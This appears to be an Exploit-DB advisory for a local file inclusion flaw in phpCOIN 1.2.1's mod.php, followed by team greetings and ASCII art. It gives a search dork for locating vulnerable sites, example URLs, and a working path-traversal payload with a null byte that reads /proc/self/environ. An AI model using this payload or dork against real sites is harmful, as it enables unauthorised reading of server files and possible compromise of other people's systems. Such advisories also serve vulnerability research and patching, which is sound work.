exploit-db-mirror/exploits/php/webapps/11641.txt

# Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability
# Author:  _mlk_
# Software Link: null
# Version: phpCOIN 1.2.1
# Tested on: Linux*,*BSD and *windows
# Code : on paper

phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability

#############################################################################################################
#                                                                                                           #
#  [+] Discovered by : _mlk_                                                                                #
#                                                                                                           #
#  [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs                                                       #
#                                                                                                           #
#  [+] Sites :  http://code.google.com/p/bugsec/                                                            #
#               http://botecounix.com.br/blog/                                                              #
#               http://c0d3rs.wordpress.com/                                                                #
#                                                                                                           #
#############################################################################################################
#                                                                                                           #
#     [-] Information                                                                                       #
#                                                                                                           #
#  [+] Script :  phpCOIN 1.2.1                                                                              #
#                                                                                                           #
#  [+] Language :  PHP                                                                                      #
#                                                                                                           #
#  [+] Vendor :  http://www.phpcoin.com/                                                                    #
#                                                                                                           #
#  [+] Dork/String :  "Powered By phpCOIN v1.2.1" / "mod.php?mod=faq"                                       #
#                                                                                                           #
#  [+] Date :  02/03/10 (Brazil)                                                                            #
#                                                                                                           #
#############################################################################################################
#                                                                                                           #
#     [*] Example :                                                                                         #
#                                                                                                           #
#        http://localhost/[PATH]/mod.php?mod=[LFI]%00#
#        http://localhost/mod.php?mod=[LFI]%00#
#                                                                                                           #
#                                                                                                           #
#        ---------------------------------------------------------------------------------------            #
#                                                                                                           #
#                                                                                                           #
#     [*] Exploit :                                                                                         #
#                                                                                                           #
#          /../../../../../../proc/self/environ%00     #
#          /proc/self/environ%00                          #
#                                                                                                           #
#                                                                                                           #
#        ---------------------------------------------------------------------------------------            #
#                                                                                                           #
#                                                                                                           #
#     [*] Demo :                                                                                            #
#                                                                                                           #
#          http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00              #
#                                                                                                           #
#                                                                                                           #
#############################################################################################################
#                                                                                                           #
#  _\|/_ Greetz :                                                                                           #
#                                                                                                           #
#        Cooler_ , m0nad , i4k , F10N4 , dr4k3 , m1cr0n , l4rt , sh0rtkiller , hox , d4m4g3 , M0nt3r ,      #
#        and all my friends emos ... xD                                                                     #
#                                                                                                           #
#############################################################################################################
	      ,,                ,,
	    (((((             )))))
	   ((((((             ))))))
	   ((((((   Overflow  ))))))
	    (((((,e@@@@@@@@@@e,)))))
	     (((@@@@@@@@@@@@@@@@)))         BUGSEC TEAM
	      \@@/,:::,\/,:::,\@@/
	     /@@@|:::::||:::::|@@@\
	    / @@@\':::'/\':::'/@@@ \
	   /  /@@@@@@@//\\@@@@@@@\  \
	  (  /  '@@@@@@@@@@@@@@'  \  )
	   \(     /          \     )/
	     \   (            )   / ('-.)' [Ruby](`'.) '
	          \          /    ('-.)' (`'.)[ASM] '('-.)'
            . '  .            ('-.)' (`'.) '('-.)' (`'.) '
               ' .( '.) '[Flex+bison]('-.)' (`'.) '('-.)' (`'.) '
       _     ('-.)' (`'.) '('-.)' (`'.) '('-.)'[Emacs] (`'.) (`'.) ''
      |0|=======- -(. ')`[VIM]( .-`)(`'.) ',(-')'('-.)' (`'.) (`'.) '
   .--`+'--.  .  (' -,).(') .('-.)' (`'.) '('-.)' (`'.)(`'.) [Python]' '
   |`-----'|   (' .) - ('. )[Perl]('-.)' (`'.) '('-.)' (`'.) '(`'.) '
   |       |    . ('[PHP] `.  )('-.)' (`'.)[REGEX] '('-.)' (`'.) '
   |  ===  |       ` .  `('-.)'[C/C++] (`'.) ('-.)' (`'.) ''
   |BugSec |          ('-.)' (`'.) '('-.)[AWK]' (`'.) '
   |  ---  |
   |       |                Art by Cooler_
   |  GDB  |
   |       |
   `-.___.-'